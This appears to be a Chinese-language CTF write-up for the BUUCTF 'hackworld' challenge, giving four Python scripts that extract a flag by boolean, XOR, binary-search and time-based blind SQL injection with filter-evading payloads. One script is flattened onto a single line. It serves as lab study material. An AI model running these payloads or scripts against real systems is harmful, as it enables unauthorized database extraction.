脚本学习(1)


hackworld(盲注,这里可以使用时间,布尔)

根据一波手动测试,知道过滤了&,||,and,or,for,空格,等等; 测试的时候,除了被检验出来的注入,还存在Error Occured When Fetch Result. 和 Hello, glzjin wants a girlfriend. 两种页面,(其实还有一种直接bool(false) 的页面) 所以尝试布尔注入: -1=(23<231)

-1=(23>231)

的确存在布尔报错,好,上脚本: 自己写的极慢的垃圾脚本:

# Boolean-based blind extraction script for the challenge above (Python 2: `print` statement
# syntax).  Every request asks a single yes/no question, "is ASCII(flag[n]) == m?", and the
# answer is read from which of the application's fixed response pages comes back.
import requests
import re  # imported but never used

s = ''  # characters recovered so far, in position order
url = "http://040e26d3-7560-45ab-9050-a5feb7312017.node3.buuoj.cn/index.php"
for n in range(1, 16):  # flag positions 1..15 are probed unconditionally (no end-of-flag check)
    for m in range(31, 127, 1):  # 31 127 -- every printable ASCII code is tried for this position
        # `if(<match>,0,1)` evaluates to 0 when position n equals m and to 1 otherwise; the
        # outer `-1=(...)` comparison is what the page author found to flip the response page
        # (see the `-1=(23<231)` / `-1=(23>231)` probes above).  Note the payload contains no
        # spaces, `and`, `or` or `&`, since the page author reports those are filtered.
        id = "-1=(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" % (n, m)
        r = requests.session()  # a fresh session and a GET precede every single POST
        m1 = r.get(url)
        if m1:  # a Response is truthy for non-error status codes
            exp = {"id": id}  # the injection travels in the POST parameter `id`
            f = r.post(url, data=exp)
            content = f.text
            # print content
            # print m
            # The "Hello, ..." page is taken as the "match" oracle; any other page (including
            # the "Error Occured" one mentioned above) counts as a miss.
            if "Hello, glzjin wants a girlfriend." in content:
                print chr(m)
                s += chr(m)
            else:
                print "no"
print "flag is:" + s

异或:

# XOR variant of the script above (Python 2 `print` syntax).  Only the payload differs: the
# oracle is `1^(...)`, so a matching character makes the expression 1^0 = 1 and a mismatch
# makes it 1^1 = 0.
import requests
import re  # imported but never used

s = ''  # characters recovered so far, in position order
url = "http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php"
for n in range(1, 16):  # flag positions 1..15 are probed unconditionally (no end-of-flag check)
    for m in range(31, 127, 1):  # 31 127 -- every printable ASCII code is tried for this position
        # `if(<match>,0,1)` is 0 on a match and 1 otherwise; XOR with 1 inverts it, so the
        # "Hello" page corresponds to a match.
        id = "1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" % (n, m)
        r = requests.session()  # a fresh session and a GET precede every single POST
        m1 = r.get(url)
        if m1:  # a Response is truthy for non-error status codes
            exp = {"id": id}  # the injection travels in the POST parameter `id`
            f = r.post(url, data=exp)
            content = f.text
            # print content
            # print m
            if "Hello, glzjin wants a girlfriend." in content:
                print chr(m)
                s += chr(m)
            else:
                print "no"
print "flag is:" + s

放个大佬的二分查找脚本:

#!/usr/bin/python #-*-coding:utf-8 -*- import requests import re def flag_get(start,f,url): #确定start位的字符 a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))='+str(f)+'),0,1))' data = {'id': a } url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php' r= requests.post(url, data) s=r.text #print(s) if 'Hello' in s: return 1 else: return 0 def flag_find(start,f,url): #确定 a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))>'+str(f)+'),0,1))' data = {'id': a } url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php' r= requests.post(url, data) s=r.text #print(s) if 'Hello' in s: return 1 else: return 0 if __name__ == '__main__': url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php' flag_kouhao=125 flag='' num=1 #从第num位开始爆破 while 1: start=32 #ascii的起始范围(10进制) last=126 #ascii的终止范围(10进制) mid=int((start+last)/2) while 1: if(flag_get(num,flag_kouhao,url)): flag=flag+'}' print('flag is :'+flag) exit(1) print('strat is '+str(start)) print(' mid is '+str(mid)) print('last is '+str(last)) print('****************************************') if(flag_find(num,mid,url)): start=mid mid=int((start+last)/2) if ((last-start)<5): break else: last=mid mid=int((start+last)/2) if ((last-start)<5): break print(start) print(last) print('****************************************') for i in range(start,last+1): print(i) if(flag_get(num,i,url)): f=chr(i) flag=flag+f print('****************************************') print(' num is '+str(num)) print('char is '+f) print('flag is '+flag) print('****************************************') break num=num+1 print(flag)

时间盲注:

大佬脚本:

# Time-based blind extraction (Python 3 `print()` syntax).  The oracle is response time
# rather than page content: `sleep(<cond>)` delays the reply only when the condition holds,
# and a 1 s client timeout is used to detect that delay.
import requests


def six_six_six(url):
    """Recover the flag one prefix character at a time by timing POSTs to `url`.

    Stops after a '}' has been appended; prints each intermediate prefix.
    """
    flag = ''  # prefix recovered so far
    while True:
        for i in 'abcdefghijklmnopqrstuvwxyz0123456789{}_-':  # candidate alphabet
            # `sleep(x)` where x is 1 when the flag starts with the prefix tried so far plus
            # the candidate `i`, and 0 otherwise.
            data = {'id': "sleep((select(flag)from(flag)where(flag)like('f%'))like('{i}%'))".format(i=flag + i)}
            print(data)
            try:
                requests.post(url=url, data=data, timeout=1)
            except:
                # Any exception -- a timeout, but also a connection error or other network
                # failure -- is interpreted as "the sleep fired", i.e. the candidate matched.
                flag = flag + i
                print('[*]%s' % flag)
                break
        # `i` is the last candidate tried; it is '}' only when that character was appended
        # (or when the whole alphabet was exhausted without a hit, since '}' is not last).
        if i == '}':
            break
    print('[+]%s' % flag)


url = 'http://040e26d3-7560-45ab-9050-a5feb7312017.node3.buuoj.cn/index.php'
six_six_six(url)